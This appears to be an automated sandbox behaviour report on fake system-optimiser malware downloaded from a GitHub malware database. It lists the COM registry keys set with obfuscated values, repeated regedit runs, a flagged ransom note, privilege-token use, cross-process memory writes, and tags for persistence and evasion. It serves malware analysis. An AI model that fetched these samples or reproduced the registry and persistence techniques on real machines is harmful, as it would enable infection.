Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvJGKCaIxsvo{P" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\AppId = "{0C3B05FB-3498-40C3-9C03-4B22D735550C}" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ = "%SystemRoot%\\SysWow64\\rasdlg.dll" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\LocalizedString = "@%SystemRoot%\\system32\\rasdlg.dll,-361" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_j[DNKa" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09} C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\Enabled = "1" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\dUiEfhXoo = "QnYbUK|C{LO^qD@VnbEizTpua" C:\PROGRA~2\REGIST~1\RegClean.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\RegistryCleaner.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\CPURocket.7z:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 33 N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Token: 33 N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4920 wrote to memory of 4528 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 768 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4528 wrote to memory of 2500 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A N/A N/A

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eedb6394-5950-4d89-a565-572d2fb75f3f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a7d5423-5914-446b-843b-b3c2ea8dad02} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3248 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90fc16bd-e58c-4f03-bf7d-2ec01c7d469f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2704 -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5b70ebf-9f18-4373-870c-65b2d8e3d05b} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4244 -prefMapHandle 4264 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc10bd96-f782-44ed-b14d-d6a4d758add2} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" utility

C:\Program Files\Mozilla Firefox\firefox.exe

